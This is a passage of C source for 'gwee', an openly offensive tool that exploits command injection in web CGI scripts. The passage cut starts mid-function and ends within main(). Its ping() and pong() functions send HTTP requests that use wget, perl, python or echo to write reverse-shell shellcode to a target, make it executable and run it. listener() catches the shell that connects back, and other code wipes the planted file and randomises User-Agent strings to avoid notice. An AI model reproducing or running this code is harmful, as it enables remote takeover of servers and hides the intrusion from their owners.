        } else if ((input[a] >= 'A') && (input[a] <= 'F')) {
            y = ((input[a] - 'A') + 10) * 16;
        } else if ((input[a] >= 'a') && (input[a] <= 'f')) {
            y = ((input[a] - 'a') + 10) * 16;
        } else {
            free(decoded);
            return NULL;
        }

        /* get the second ascii hex num (the second nibble) */
        a++;
        if ((input[a] >= '0') && (input[a] <= '9')) {
            y += (input[a] - '0');
        } else if ((input[a] >= 'A') && (input[a] <= 'F')) {
            y += ((input[a] - 'A') + 10);
        } else if ((input[a] >= 'a') && (input[a] <= 'f')) {
            y += ((input[a] - 'a') + 10);
        } else {
            free(decoded);
            return NULL;
        }

        decoded[x] = y;
        x++;

        /* loop */
        a++;
    }

    /* null terminate it, in case it's ascii */
    decoded[x] = 0;

    /* write output to file pointer */
    if (fp)
        fwrite(decoded, x, 1, fp);

    return decoded;
}



/*
 * decodeoctal isn't used anymore, everything is ascii-encoded hex
 *
char *decodeoctal(char *input, FILE *fp) {
    int a, x, y;
    char *decoded;

    if (!input)
        return NULL;

    if (strlen(input) < 4)
        return NULL;

    // allocate some memory
    x = (int)((strlen(input) / 4) + 16);
    if (!(decoded = (char*)malloc(x)))
        return NULL;

    a = 0;
    x = 0;
    while (input[a]) {
        if (input[a] != '\\')
            return NULL;

        // get first num
        a++;
        if ((input[a] < '0') || (input[a] > '9')) {
            free(decoded);
            return NULL;
        }
        y = (input[a]-'0') * 64;

        // get second num
        a++;
        if ((input[a] < '0') || (input[a] > '9')) {
            free(decoded);
            return NULL;
        }
        y += (input[a]-'0') * 8;

        // get third num
        a++;
        if ((input[a] < '0') || (input[a] > '9')) {
            free(decoded);
            return NULL;
        }
        y += (input[a] - '0');

        decoded[x] = y;
        x++;

        // loop
        a++;
    }

    // null terminate it, in case it's ascii
    decoded[x] = 0;

    // write output to file pointer
    if (fp)
        fwrite(decoded, x, 1, fp);

    return decoded;
}
*/



/* print_target() extracts the hostname from an url and writes it to stdout */
void print_target(char *u) {
    int a;
    char *tempp, *xurl;
    char slashslash[] = "//";

    if (!u)
        return;

    if (!(xurl = strdup(u)))
        return;

    if (!(tempp = strstr(xurl, slashslash))) {
        tempp = xurl;
    } else {
        tempp += strlen(slashslash);
    }

    a = 0;
    while (tempp[a]) {
        if (tempp[a] == '/' || tempp[a] == ':') {
            tempp[a] = 0;
            break;
        }
        a++;
    }

    printf("[i] target: %s\n", tempp);
    free(xurl);
}



/* wipeout() removes the installed shellcode file */
void wipeout() {
    #ifdef WIN32
      if (!pongsilent)
    #else
      if (!silent)
    #endif
        printf("[i] attempting to erase installed shellcode from target box\n");

    /* run shred -fu <tmpfile> on target box */
/*
    if (!silent)
        printf("[+] running \"shred -fu %s\" on target\n", TMPFILE);

    if (!httpget) { // POST
        snprintf(buf, sizeof(buf), "%s/%s", url, cgi);
        snprintf(buf2, sizeof(buf2), "%sshred%%20%%2Dfu%%20%s%s",
            y_opt, TMPFILE, z_opt);
        httpclient("POST", buf, user_agent, buf2, silent);
    } else {    // GET
        snprintf(buf, sizeof(buf), "%s/%s%sshred%%20%%2Dfu%%20%s%s",
            url, cgi, y_opt, TMPFILE, z_opt);
        httpclient(httpmethod, buf, user_agent, NULL, silent);
    }
*/


    /* run rm -f <tmpfile> on target box */
    #ifdef WIN32
      if (!pongsilent)
    #else
      if (!silent)
    #endif
        printf("[+] running \"rm -f %s\" on target\n", TMPFILE);

    if (!httpget) { /* POST */
        snprintf(buf, sizeof(buf), "%s", url);
        snprintf(buf2, sizeof(buf2), "%srm%%20%%2Df%%20%s%s",
            y_opt, TMPFILE, z_opt);
        httpclient("POST", buf, user_agent, buf2,
        #ifdef WIN32
            pongsilent);
        #else
            silent);
        #endif
    } else {    /* GET */
        snprintf(buf, sizeof(buf), "%s%srm%%20%%2Df%%20%s%s",
            url, y_opt, TMPFILE, z_opt);
        httpclient(httpmethod, buf, user_agent, NULL,
        #ifdef WIN32
            pongsilent);
        #else
            silent);
        #endif
    }

    #ifdef WIN32
      if (!pongsilent)
    #else
      if (!silent)
    #endif
        printf("[i] shellcode wipe finished\n");

    return;
}

/* ping() attempts to install our shellcode on the target box */
void ping(void) {
    if (!silent) {
        printf("[+] attempting to inject shellcode into target\n");
        if (httpget && !dumpout && !wgeturl)
            printf("[i] to fit into a 1024 byte %s request the shellcode will be split up\n", httpmethod);
    }
    /* attempt to inject our shellcode into the target box */

    if (wgeturl) {
        /* the wget method is very different from the regular injection methods */
        if (!httpget) { /* POST */
            snprintf(buf, sizeof(buf), "%s", url);
            snprintf(buf2, sizeof(buf2), "%s%swget%%20%%2DYoff%%20%%2Dq%%20%%2DO%%20%s%%20%s%s",
                y_opt, imprefix, TMPFILE, wgeturl, z_opt);
            httpclient("POST", buf, user_agent, buf2, silent);
        } else {    /* GET */
            snprintf(buf, sizeof(buf), "%s%s%swget%%20%%2DYoff%%20%%2Dq%%20%%2DO%%20%s%%20%s%s",
                url, y_opt, imprefix, TMPFILE, wgeturl, z_opt);
            httpclient(httpmethod, buf, user_agent, NULL, silent);
        }
    } else {
        /* regular, non-wget injection method, the preferred way to go */

        if (!httpget) { /* POST */
            if (!(shellcode_split1 = percentencode(shellcode_p))) {
                fprintf(stderr, "[?] malloc(): %s\n", strerror(errno));
                return;
            }
        } else {    /* GET */
            /* our GET request must be less than 1024 bytes, so we'll split the shellcode in pieces */

            /* we calculate it like this in order to be 4-byte aligned at all times */
            i = (int)strlen(shellcode_p) / (int)4;    /* each ascii-hex is 4 bytes */
            i /= (int)4; /* we want to split the shellcode into 4 pieces */
            i *= (int)4; /* ascii-encoded hex is 4 bytes */

            if (i >= 1024) {
                fprintf(stderr, "[?] heap may overflow, shellcode need to be split in more pieces\n");
                return;
            }

            if (!(tempmem1 = malloc(1024))) {
                fprintf(stderr, "[?] malloc(): %s\n", strerror(errno));
                return;
            }
            if (!(tempmem2 = malloc(1024))) {
                fprintf(stderr, "[?] malloc(): %s\n", strerror(errno));
                return;
            }
            if (!(tempmem3 = malloc(1024))) {
                fprintf(stderr, "[?] malloc(): %s\n", strerror(errno));
                return;
            }
            if (!(tempmem4 = malloc(1024))) {
                fprintf(stderr, "[?] malloc(): %s\n", strerror(errno));
                return;
            }

            /* split me sideways baby... */
            strncpy(tempmem1, shellcode_p, i);
            tempmem1[i] = 0;
            strncpy(tempmem2, shellcode_p+i, i);
            tempmem2[i] = 0;
            strncpy(tempmem3, shellcode_p+i+i, i);
            tempmem3[i] = 0;
            memset(tempmem4, 0, 1024);
            strncpy(tempmem4, shellcode_p+i+i+i, i);


            if (!(shellcode_split1 = percentencode(tempmem1))) {
                fprintf(stderr, "[?] percentencode() failed!\n");
                return;
            }
            if (!(shellcode_split2 = percentencode(tempmem2))) {
                fprintf(stderr, "[?] percentencode() failed!\n");
                return;
            }
            if (!(shellcode_split3 = percentencode(tempmem3))) {
                fprintf(stderr, "[?] percentencode() failed!\n");
                return;
            }
            if (!(shellcode_split4 = percentencode(tempmem4))) {
                fprintf(stderr, "[?] percentencode() failed!\n");
                return;
            }

            free(tempmem1);
            free(tempmem2);
            free(tempmem3);
            free(tempmem4);
        }

        if (injection_method == IM_PERL) {
            /* use perl as injection method */
            if (!httpget) { /* POST */
                snprintf(buf, sizeof(buf), "%s", url);
                snprintf(buf2, sizeof(buf2), "%s%sperl%%20-e%%20%%22print%%20%%5C%%22%s%%5C%%22%%22%%20%%3E%s%s",
                    y_opt, imprefix, shellcode_split1, TMPFILE, z_opt);
                httpclient("POST", buf, user_agent, buf2, silent);
            } else {    /* GET */
                puts(piece1_text);
                snprintf(buf, sizeof(buf), "%s%s%sperl%%20-e%%20%%22print%%20%%5C%%22%s%%5C%%22%%22%%20%%3E%s%s",
                    url, y_opt, imprefix, shellcode_split1, TMPFILE, z_opt);
                httpclient(httpmethod, buf, user_agent, NULL, silent);

                puts(piece2_text);
                snprintf(buf, sizeof(buf), "%s%s%sperl%%20-e%%20%%22print%%20%%5C%%22%s%%5C%%22%%22%%20%%3E%%3E%s%s",
                    url, y_opt, imprefix, shellcode_split2, TMPFILE, z_opt);
                httpclient(httpmethod, buf, user_agent, NULL, silent);

                puts(piece3_text);
                snprintf(buf, sizeof(buf), "%s%s%sperl%%20-e%%20%%22print%%20%%5C%%22%s%%5C%%22%%22%%20%%3E%%3E%s%s",
                    url, y_opt, imprefix, shellcode_split3, TMPFILE, z_opt);
                httpclient(httpmethod, buf, user_agent, NULL, silent);

                puts(piece4_text);
                snprintf(buf, sizeof(buf), "%s%s%sperl%%20-e%%20%%22print%%20%%5C%%22%s%%5C%%22%%22%%20%%3E%%3E%s%s",
                    url, y_opt, imprefix, shellcode_split4, TMPFILE, z_opt);
                httpclient(httpmethod, buf, user_agent, NULL, silent);
            }
        } else if (injection_method == IM_PYTHON) {
            /* use python as injection method */
            if (!httpget) { /* POST */
                snprintf(buf, sizeof(buf), "%s", url);
                snprintf(buf2, sizeof(buf2), "%s%spython%%20-c%%20%%22__import__%%28%%5C%%22sys%%5C%%22%%29.stdout.write%%28%%5C%%22%s%%5C%%22%%29%%22%%20%%3E%s%s",
                    y_opt, imprefix, shellcode_split1, TMPFILE, z_opt);
                httpclient("POST", buf, user_agent, buf2, silent);
            } else {    /* GET */
                puts(piece1_text);
                snprintf(buf, sizeof(buf), "%s%s%spython%%20-c%%20%%22__import__%%28%%5C%%22sys%%5C%%22%%29.stdout.write%%28%%5C%%22%s%%5C%%22%%29%%22%%20%%3E%s%s",
                    url, y_opt, imprefix, shellcode_split1, TMPFILE, z_opt);
                httpclient(httpmethod, buf, user_agent, NULL, silent);

                puts(piece2_text);
                snprintf(buf, sizeof(buf), "%s%s%spython%%20-c%%20%%22__import__%%28%%5C%%22sys%%5C%%22%%29.stdout.write%%28%%5C%%22%s%%5C%%22%%29%%22%%20%%3E%%3E%s%s",
                    url, y_opt, imprefix, shellcode_split2, TMPFILE, z_opt);
                httpclient(httpmethod, buf, user_agent, NULL, silent);

                puts(piece3_text);
                snprintf(buf, sizeof(buf), "%s%s%spython%%20-c%%20%%22__import__%%28%%5C%%22sys%%5C%%22%%29.stdout.write%%28%%5C%%22%s%%5C%%22%%29%%22%%20%%3E%%3E%s%s",
                    url, y_opt, imprefix, shellcode_split3, TMPFILE, z_opt);
                httpclient(httpmethod, buf, user_agent, NULL, silent);

                puts(piece4_text);
                snprintf(buf, sizeof(buf), "%s%s%spython%%20-c%%20%%22__import__%%28%%5C%%22sys%%5C%%22%%29.stdout.write%%28%%5C%%22%s%%5C%%22%%29%%22%%20%%3E%%3E%s%s",
                    url, y_opt, imprefix, shellcode_split4, TMPFILE, z_opt);
                httpclient(httpmethod, buf, user_agent, NULL, silent);
            }
        } else if (injection_method == IM_PRINTF) {
            /* use printf as injection method */
            if (!httpget) { /* POST */
                snprintf(buf, sizeof(buf), "%s", url);
                snprintf(buf2, sizeof(buf2), "%s%sprintf%%20%%22%s%%22%%20%%3E%s%s",
                    y_opt, imprefix, shellcode_split1, TMPFILE, z_opt);
                httpclient("POST", buf, user_agent, buf2, silent);
            } else {    /* GET */
                puts(piece1_text);
                snprintf(buf, sizeof(buf), "%s%s%sprintf%%20%%22%s%%22%%20%%3E%s%s",
                    url, y_opt, imprefix, shellcode_split1, TMPFILE, z_opt);
                httpclient(httpmethod, buf, user_agent, NULL, silent);

                puts(piece2_text);
                snprintf(buf, sizeof(buf), "%s%s%sprintf%%20%%22%s%%22%%20%%3E%%3E%s%s",
                    url, y_opt, imprefix, shellcode_split2, TMPFILE, z_opt);
                httpclient(httpmethod, buf, user_agent, NULL, silent);

                puts(piece3_text);
                snprintf(buf, sizeof(buf), "%s%s%sprintf%%20%%22%s%%22%%20%%3E%%3E%s%s",
                    url, y_opt, imprefix, shellcode_split3, TMPFILE, z_opt);
                httpclient(httpmethod, buf, user_agent, NULL, silent);

                puts(piece4_text);
                snprintf(buf, sizeof(buf), "%s%s%sprintf%%20%%22%s%%22%%20%%3E%%3E%s%s",
                    url, y_opt, imprefix, shellcode_split4, TMPFILE, z_opt);
                httpclient(httpmethod, buf, user_agent, NULL, silent);
            }
        } else {
            /* use echo -ne as injection method */
            if (!httpget) { /* POST */
                snprintf(buf, sizeof(buf), "%s", url);
                snprintf(buf2, sizeof(buf2), "%s%secho%%20-ne%%20%%22%s%%22%%20%%3E%s%s",
                    y_opt, imprefix, shellcode_split1, TMPFILE, z_opt);
                httpclient("POST", buf, user_agent, buf2, silent);
            } else {    /* GET */
                puts(piece1_text);
                snprintf(buf, sizeof(buf), "%s%s%secho%%20-ne%%20%%22%s%%22%%20%%3E%s%s",
                    url, y_opt, imprefix, shellcode_split1, TMPFILE, z_opt);
                httpclient(httpmethod, buf, user_agent, NULL, silent);

                puts(piece2_text);
                snprintf(buf, sizeof(buf), "%s%s%secho%%20-ne%%20%%22%s%%22%%20%%3E%%3E%s%s",
                    url, y_opt, imprefix, shellcode_split2, TMPFILE, z_opt);
                httpclient(httpmethod, buf, user_agent, NULL, silent);

                puts(piece3_text);
                snprintf(buf, sizeof(buf), "%s%s%secho%%20-ne%%20%%22%s%%22%%20%%3E%%3E%s%s",
                    url, y_opt, imprefix, shellcode_split3, TMPFILE, z_opt);
                httpclient(httpmethod, buf, user_agent, NULL, silent);

                puts(piece4_text);
                snprintf(buf, sizeof(buf), "%s%s%secho%%20-ne%%20%%22%s%%22%%20%%3E%%3E%s%s",
                    url, y_opt, imprefix, shellcode_split4, TMPFILE, z_opt);
                httpclient(httpmethod, buf, user_agent, NULL, silent);
            }
        }
    }

    /* attempt to chmod 755 our shellcode on the target box */

    if (!httpget) { /* POST */
        snprintf(buf, sizeof(buf), "%s", url);
        snprintf(buf2, sizeof(buf2), "%schmod%%20755%%20%s%s",
            y_opt, TMPFILE, z_opt);
        httpclient("POST", buf, user_agent, buf2, silent);
    } else {    /* GET */
        snprintf(buf, sizeof(buf), "%s%schmod%%20755%%20%s%s",
            url, y_opt, TMPFILE, z_opt);
        httpclient(httpmethod, buf, user_agent, NULL, silent);
    }

    /* ok, either it's installed or it failed... either way, we'll go for the next phase, pong() */
    return;
}

/* pong() attempts to execute the shellcode on the target box */
void pong(void) {
    /* buffers and temporary variables, can't use the global buf here since
       listener() is using them, won't work when we're threaded under win32 */
    char pongbuf[4096];
    char pongbuf2[4096];
    #ifdef WIN32
      if (!pongsilent)
    #else
      if (!silent)
    #endif
        printf("[+] moment of truth; requesting injected shellcode to connect\n");

    if (!httpget) { /* POST */
        snprintf(pongbuf, sizeof(pongbuf), "%s", url);
        snprintf(pongbuf2, sizeof(pongbuf2), "%sexec%%20%s%s",
            y_opt, TMPFILE, z_opt);
        httpclient("POST", pongbuf, user_agent, pongbuf2,
        #ifdef WIN32
            pongsilent);
        #else
            silent);
        #endif
    } else {  /* GET */
        snprintf(pongbuf, sizeof(pongbuf), "%s%sexec%%20%s%s",
            url, y_opt, TMPFILE, z_opt);
        httpclient(httpmethod, pongbuf, user_agent, NULL,
        #ifdef WIN32
            pongsilent);
        #else
            silent);
        #endif
    }

    #ifdef WIN32
      if (!pongsilent)
    #else
      if (!silent)
    #endif
        printf("[i] request done\n");

    return;
}


#ifndef WIN32
/* signalhandler, for the listener() function below */
void signalhandler(int signum) {
    switch(signum) {
        case SIGALRM:
            if (!silent)
                printf("[i] operation timed out!\n");
            exit(0);
        case SIGCHLD:
            wait(0);
            break;
        default:
            break;
    }
    return;
}
#endif

/* listener() works just like "nc -l -p lport" */
void listener(void) {
    #ifdef WIN32
        SOCKET sd;
        SOCKET clisd;
        int clilen;
    #else
        int sd, clisd;
        socklen_t clilen;
    #endif

    static int sopt = 1;
    struct sockaddr_in servAddr, cliAddr;

  #ifdef WIN32
    if ((sd = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
  #else
    if ((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
  #endif
        fprintf(stderr, "[?] cannot open socket: %s\n",
        #ifdef WIN32
        WSAstrerror(WSAGetLastError())
        #else
        strerror(errno)
        #endif
        );
        return;
    }

    /* bind to lport, any address */
    servAddr.sin_family = AF_INET;
    servAddr.sin_addr.s_addr = htonl(INADDR_ANY);
    servAddr.sin_port = htons(lport);

    /* set REUSEADDR socket option */

  #ifdef WIN32
    if (setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char*)&sopt, sizeof(sopt))) {
  #else
    if (setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (void*)&sopt, sizeof(sopt))) {
  #endif
        fprintf(stderr, "[?] setsockopt(): %s\n",
        #ifdef WIN32
        WSAstrerror(WSAGetLastError())
        #else
        strerror(errno)
        #endif
        );
        return;
    }
    /* call bind() */
    if (bind(sd, (struct sockaddr*) &servAddr, sizeof(servAddr))) {
        fprintf(stderr, "[?] could not bind(): %s\n",
        #ifdef WIN32
        WSAstrerror(WSAGetLastError())
        #else
        strerror(errno)
        #endif
        );
        return;
    }
    /* listen for incoming connections */
    if (listen(sd, 1)) {
        fprintf(stderr, "[?] listen(): %s\n",
        #ifdef WIN32
        WSAstrerror(WSAGetLastError())
        #else
        strerror(errno)
        #endif
        );
        return;
    }

    if (!silent) {
      #ifdef WIN32
        printf("[+] listening for incoming connection on port %u\n", lport);
      #else
        printf("[+] listening for incoming connection on port %u, ", lport);
        if (timeout)
            printf("timeout is %u seconds\n", timeout);
        else
            printf("no timeout\n");
      #endif
    }

    #ifndef WIN32
        /* SIGALRM doesn't exist under win32, and we don't implement the
         * windows-specific alarm().
         */
        if (timeout) {
            /* install a signal handler to timeout */
            signal(SIGALRM, signalhandler);
            /* set alarm to go off at <timeout> seconds */
            alarm(timeout);
        }
    #endif

    /* accept new connections, this will block */
    clilen = sizeof(cliAddr);
  #ifdef WIN32
    if ((clisd = accept(sd, (struct sockaddr *)&cliAddr, &clilen)) == INVALID_SOCKET) {
  #else
    if ((clisd = accept(sd, (struct sockaddr *)&cliAddr, &clilen)) < 0) {
  #endif
        fprintf(stderr, "[?] accept(): %s\n",
        #ifdef WIN32
        WSAstrerror(WSAGetLastError())
        #else
        strerror(errno)
        #endif
        );
        return;
    }

    /* close listening socket, we won't need it */
    #ifdef WIN32
        closesocket(sd);
    #else
        close(sd);
    #endif

    #ifndef WIN32
    /* uninstall signal handler for SIGALRM, we don't want it to time out now,
     * since we've got an open connection
     */
    signal(SIGALRM, SIG_IGN);
    #endif

    if (!silent) {
        printf("[i] got connection from %s:%u\n",
            inet_ntoa(cliAddr.sin_addr), ntohs(cliAddr.sin_port));
    }

    fflush(stdout);
    fflush(stderr);


    if (!only_listen) {
        sprintf(buf, "uname -a ; shred -fu %s ; rm -f %s ; w ; pwd\n",
            TMPFILE, TMPFILE);
        send(clisd, buf, strlen(buf), 0);
    }

#ifdef WIN32
    /* win32 readwrite code */

    { /* new frame */
        int stdin_is_tty;

        if (!_isatty(STDOUT_FILENO)) {
            _setmode(STDOUT_FILENO, _O_BINARY);
        }
        if ((stdin_is_tty = _isatty(STDIN_FILENO)) == FALSE) {
            _setmode(STDIN_FILENO, _O_BINARY);
        }

        while (1) {
            fd_set fds;
            struct timeval tv;

            FD_ZERO(&fds);
            FD_SET(clisd, &fds);
            tv.tv_sec = 0;
            tv.tv_usec = 1000;

            if (select(FD_SETSIZE, &fds, NULL, NULL, &tv) != SOCKET_ERROR) {
                int cnt;
                if (FD_ISSET(clisd, &fds)) {
                    if ((cnt = recv(clisd, buf, sizeof(buf), 0)) == SOCKET_ERROR) {
                        int wsaerr = WSAGetLastError();
                        if (wsaerr == WSAEWOULDBLOCK) { /* don't think this is used */
                            continue;
                        } else {
                            break;
                        }
                    } else if (cnt == 0) {
                        break;
                    }
                    write(STDOUT_FILENO, buf, cnt);
                }
            } else {
                fprintf(stderr, "[?] select(): %s\n", WSAstrerror(WSAGetLastError()));
                break;
            }


            if (stdin_is_tty) {
                if (kbhit()) {
                    int cnt = read(STDIN_FILENO, buf, sizeof(buf));
                    if (cnt <= 0) {
                        close(STDIN_FILENO);
                        break;
                    } else {
                        send(clisd, buf, cnt, 0);
                    }
                }
            } else {
                /* this will block until a CR is received for every loop :( */
                int cnt = read(STDIN_FILENO, buf, sizeof(buf));
                if (cnt <= 0) {
                    close(STDIN_FILENO);
                    break;
                } else {
                    send(clisd, buf, cnt, 0);
                }
            }
        } /* end while loop */
    } /* end new frame */


#else

    /* unix readwrite code */
    while(1) {
        fd_set fds;

        FD_ZERO(&fds);
        FD_SET(STDIN_FILENO, &fds);
        FD_SET(clisd, &fds);

        if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) > 0) {
            int cnt;
            if (FD_ISSET(STDIN_FILENO, &fds)) {
                if ((cnt = read(STDIN_FILENO, buf, sizeof(buf))) < 1) {
                    if (cnt && (errno == EWOULDBLOCK || errno == EAGAIN))
                        continue;
                    else
                        break;
                }
                send(clisd, buf, cnt, 0);
            }

            if (FD_ISSET(clisd, &fds)) {
                if ((cnt = recv(clisd, buf, sizeof(buf), 0)) < 1) {
                    if (errno == EWOULDBLOCK || errno == EAGAIN)
                        continue;
                    else
                        break;
                }
                write(STDOUT_FILENO, buf, cnt);
            }
        }
    }
#endif

    #ifdef WIN32
        closesocket(clisd);
    #else
        close(clisd);
    #endif
    return;
}


#ifdef WIN32
/*** thread function for -L under Windoze ***/

static int thread_lock = 0;

static VOID pongthread(LPVOID Parameter) {
    /* child */
    pongsilent = 1;
    pong();
    if (dowipeout)
        wipeout();
    thread_lock = 0;
    ExitThread(0);
}
#endif

/*** main() **********************************************************/

int main(int argc, char **argv) {
    #ifndef WIN32
    pid_t pid;
    #endif

    while ((i = getopt(argc, argv, "hVy:z:GHl:p:b:s:i:I:T:a:vqLAt:fw:d:Pr")) != -1) {
        switch(i) {
            case 'h':
                usage();
            case 'V':
                print_banner_without_colors();
                exit(1);
            case 'y':
                y_opt = (char *)strdup(optarg);
                break;
            case 'z':
                z_opt = (char *)strdup(optarg);
                break;
            case 'G':
                httpget = 1;
                httpmethod = httpmethod_get;
                break;
            case 'H':
                httpget = 1;
                httpmethod = httpmethod_head;
                break;
            case 'l':
                listen_server = (char *)strdup(optarg);
                break;
            case 'p':
                lport = (unsigned int)atoi(optarg);
                break;
            case 'b':
                sourceport = (unsigned int)atoi(optarg);
                break;
            case 's':
                shellcode = (unsigned int)atoi(optarg);
                break;
            case 'i':
                injection_method = (unsigned int)atoi(optarg);
                break;
            case 'I':
                imprefix = (char *)strdup(optarg);
                break;
            case 'T':
                TMPFILE = (char *)strdup(optarg);
                break;
            case 'a':
                user_agent = (char *)strdup(optarg);
                break;
            case 'v':
                verbose = 1;
                break;
            case 'q':
                silent = 1;
                break;
            case 'L':
                builtin_listener = 1;
                break;
            case 'A':
                only_listen = 1;
                timeout = 0;
                break;
            case 't':
                timeout = (unsigned int)atoi(optarg);
                break;
            case 'f':
                force = 1;
                break;
            case 'w':
                wgeturl = (char *)strdup(optarg);
                break;
            case 'd':
                dumpout = (char *)strdup(optarg);
                break;
            case 'P':
                dowipeout = 0;
                break;
            case 'r':
                remove_sploit = 1;
                break;
            default:
                printf("type \"gwee -h\" for help.\n");
                return 1;
        }
    }

    if (only_listen) {
        #ifdef WIN32
            /* initialize winsock first */
            init_winsock();
        #endif
        listener();
        #ifdef WIN32
            WSACleanup();
        #endif
        return 0;
    }


    if (optind < argc) {
        url = (char *)strdup(argv[optind]);
    }

    /* check usage */
    if (!dumpout) { /* if the -d option was used, no need to specify a target url */
        if (!url) {
            printf("type \"gwee -h\" for help.\n");
            return 1;
        } else if (url[0] == 0) {
            printf("type \"gwee -h\" for help.\n");
            return 1;
        }
    }

    /* print banner */
    if (!silent) {
        print_banner();
    }

    if (dumpout && wgeturl) {
        fprintf(stderr, "[?] you can't use both -d and -w\n");
        return 1;
    }

    if (dumpout) {
        if (dumpout[0] == 0) {
            fprintf(stderr, "[?] output file can't be zero-length\n");
            return 1;
        }
    }

    /* check if the port is OK */
    if ((!lport) || (lport > 65535)) {
        fprintf(stderr, "[?] %u is an invalid port (must be between 1-65535)\n", lport);
        return 1;
    }

    /* check if source port is OK, (sourceport can be 0 meaning no source porting is done) */

    if (sourceport > 65535) {
        fprintf(stderr, "[?] %u is an invalid source port (must be between 1-65535)\n", sourceport);
        return 1;
    }



    if (!dumpout) {
        /* check if -a, and if not, randomize user-agent */
        if (!user_agent) {
            /* randomize http user-agent string */
          #ifdef WIN32
            unsigned int fakeRand = time(NULL);
            fakeRand += getpid();
            srand(fakeRand);
          #else
            struct timeval tv;
	    if (gettimeofday(&tv, NULL)) {
                fprintf(stderr, "[?] gettimeofday() failed: %s\n", strerror(errno));
                return 1;
            }
	    srand((unsigned int)(tv.tv_sec + (tv.tv_usec * 100.0) + (unsigned int)getpid()));
          #endif

            i = (unsigned int)((number_of_agents*1.0)*rand()/(RAND_MAX+1.0));
            user_agent = agents[i];
        }

        /* print info about our victim (errhmm.. target) */
        if (!silent)
            print_target(url);

        if (!silent) {
            /* print info about parsed url */
            if (!httpget)
                printf("[i] url: %s\n[i] POST data: %s*SC*%s\n", url, y_opt, z_opt);
            else
                printf("[i] url: %s%s*SC*%s\n", url, y_opt, z_opt);
        }

        if (verbose && !silent) {
            printf("[i] shellcode file on target: %s\n", TMPFILE);

            /* print user-agent string to be used */
            printf("[i] user-agent: %s\n", user_agent);
        }
        if (!silent) {
            if (!httpget)
                printf("[i] using POST requests to send data\n");
            else
                printf("[i] using %s requests to send data\n", httpmethod);
        }
    }

    if (!dumpout) {
        /* check if we want to remove a previous sploit attempt */
        if (remove_sploit) {
            #ifdef WIN32
                /* initialize winsock first */
                init_winsock();
            #endif

            #ifdef WITH_SSL
                if (!strncasecmp(url, "https://", 8)) {
                    if (!silent)
                        printf("[i] initializing OpenSSL library\n");

                    SSL_library_init();
                    SSL_load_error_strings();
                    sslmethod = SSLv23_client_method();

                    if (!(sslctx = SSL_CTX_new(sslmethod))) {
                        if (!silent) {
                            fprintf(stderr, "[?] SSL_CTX_new() failed!\n");
                        }
                        #ifdef WIN32
                            WSACleanup();
                        #endif
                        return 1;
                    }
                }
            #endif

            /* we're on a removing spree... */
            wipeout();
            #ifdef WIN32
                WSACleanup();
            #endif
            return 0;
        }
    }

    if (!wgeturl) {     /* we only set up shellcode_p when not wgetting */
        /* set up the shellcode to use */
        if (shellcode == SABUSHELL_PERL) {
            shellcode_p = sabushell_perl;
            if (!silent)
                printf("[i] shellcode: Sabu's reverse Perl shellcode (portable)\n");
        } else if (shellcode == LINUX_SISHELL) {
            shellcode_p = linux_sishell;
            if (!silent)
                printf("[i] shellcode: Shadowinteger's sishell for x86 Linux\n");
        } else if (shellcode == FREEBSD_SISHELL) {
            shellcode_p = freebsd_sishell;
            if (!silent)
                printf("[i] shellcode: Shadowinteger's sishell for x86 FreeBSD\n");
        } else if (shellcode == NETBSD_SISHELL) {
            shellcode_p = netbsd_sishell;
            if (!silent)
                printf("[i] shellcode: Shadowinteger's sishell for x86 NetBSD\n");
        } else {
            shellcode_p = sabushell_python;
            if (!silent)
                printf("[i] shellcode: Sabu's reverse Python shellcode (portable)\n");
        }
    } else {
        if (!silent)
            printf("[i] shellcode from url: %s\n", wgeturl);
    }


    if (!dumpout) {
        if (!wgeturl) {
            /* print the injection method to use */
            if (injection_method == IM_PERL) {
                if (!silent)
                    printf("[i] injection method: perl -e\n");
            } else if (injection_method == IM_PYTHON) {
                if (!silent)
                    printf("[i] injection method: python -c\n");
            } else if (injection_method == IM_PRINTF) {
                if (!silent)
                    printf("[i] injection method: printf\n");
            } else {
                if (!silent)
                    printf("[i] injection method: echo -ne\n");
            }
        } else {
            if (!silent)
                printf("[i] injection method: wget\n");
        }
    }

    #ifdef WIN32
        /* now it's time initialize winsock */
        if (!silent)
            printf("[+] initializing socket library\n");
        init_winsock();
    #endif

    if (!wgeturl) {
        if (listen_server) {
            /* attacker has provided the -l option */

            if (inet_addr(listen_server) != INADDR_NONE) {
                if (!silent)
                    printf("[+] resolving %s into an ip address\n", listen_server);
            }
            if ((he = gethostbyname(listen_server)) == NULL) {
                fprintf(stderr, "[?] %s: %s\n", listen_server,
                #ifdef WIN32
                WSAstrerror(WSAGetLastError())
                #else
                hstrerror(h_errno)
                #endif
                );
                #ifdef WIN32
                    WSACleanup();
                #endif
                return 1;
            }
        } else {
            /* attacker didn't provide the -l option, use local hostname instead */
            if (gethostname(buf, sizeof(buf))) {
                fprintf(stderr, "[?] gethostname(): %s\n",
                #ifdef WIN32
                WSAstrerror(WSAGetLastError())
                #else
                strerror(errno)
                #endif
                );
                #ifdef WIN32
                    WSACleanup();
                #endif
                return 1;
            }
            if ((he = gethostbyname(buf)) == NULL) {
                fprintf(stderr, "[?] %s: %s\n", buf,
                #ifdef WIN32
                WSAstrerror(WSAGetLastError())
                #else
                hstrerror(h_errno)
                #endif
                );
                #ifdef WIN32
                    WSACleanup();
                #endif
                return 1;
            }
            if (!silent) {
                printf("[i] using %s (%s) as listen server,\n"
                       "[i] override with -l <hostname>\n",
                       he->h_name, inet_ntoa(*((struct in_addr*)he->h_addr_list[0])));
            }
        }

        if (he->h_length != 4) {
            fprintf(stderr, "[?] h_length is not 4, it's %u, i only understand ipv4 addresses\n", (unsigned int)he->h_length);
            #ifdef WIN32
                WSACleanup();
            #endif
            return 1;
        }
        (uint32_t)binary_ip = ((uint32_t *)he->h_addr_list[0])[0];
        (uint32_t)xored_ip = ((uint32_t *)he->h_addr_list[0])[0] ^ XOR;

        /* save ip in ascii dot notation form */
        snprintf(ascii_ip, sizeof(ascii_ip), "%u.%u.%u.%u",
            ((uint8_t *)&binary_ip)[0] & 0xff,
            ((uint8_t *)&binary_ip)[1] & 0xff,
            ((uint8_t *)&binary_ip)[2] & 0xff,
            ((uint8_t *)&binary_ip)[3] & 0xff);

        if (!silent)
            printf("[i] shellcode will connect to %s on port %u\n", ascii_ip, lport);

